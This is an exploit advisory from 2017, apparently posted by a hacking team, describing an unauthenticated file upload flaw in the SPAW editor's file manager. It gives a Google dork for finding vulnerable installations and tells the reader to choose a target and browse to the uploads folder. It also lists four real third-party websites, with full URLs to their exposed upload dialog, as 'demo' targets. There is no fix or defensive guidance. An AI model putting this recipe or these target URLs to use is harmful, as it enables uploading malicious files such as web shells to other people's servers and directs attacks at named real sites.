*=============================================================|
| Exploit Title: SPAW Manager File Upload Vulnerability
| Exploit Author: Ashiyane Digital Security Team
| vendor homepage : http://www.spawglass.com/
| Google Dork 1: inurl:/spaw2/dialogs/dialog.php
| Tested on: Windows 10 ~~~> Mozilla Firefox
| Date: 1 /21 / 2017
|===========|
| Vulnerability Method :GET
|===========|
| Vulnerability description:
| This page allows visitors to upload files to the server.
| Various web applications allow users to upload files (such as images, html,..).
|=============================================================|
| Then Choose a Target and put this after Upload File : /spaw2/uploads/
|=========|
|Demo :
|http://www.nirafonds.com/spaw2/dialogs/dialog.php? |module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files |
|http://www.wholehealthamerica.com/spaw2/dialogs/dialog.php?|module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
|
|http://vprofite.com/include/spaw2/dialogs/dialog.php?|module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset&scid=cf73b58bb51c52235494da752d98cac9&type=files
|
|http://www.rcst.or.th/spaw2/dialogs/dialog.php?|module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset&scid=cf73b58bb51c52235494da752d98cac9&type=files
*=============================================================|
| Special Thanks To : Behrooz_Ice، Virangar ,H_SQLI.EMpiRe ، Ehsan Cod3r ، micle ،
| Und3rgr0und ، Amir.ght ، xenotix، modiret، V For Vendetta ، Alireza ،
| r4ouf ، Spoofer ،M.R.S.L.Y And All Of My Friends ،
| The Last One : My Self, HackfanS
*=============================================================|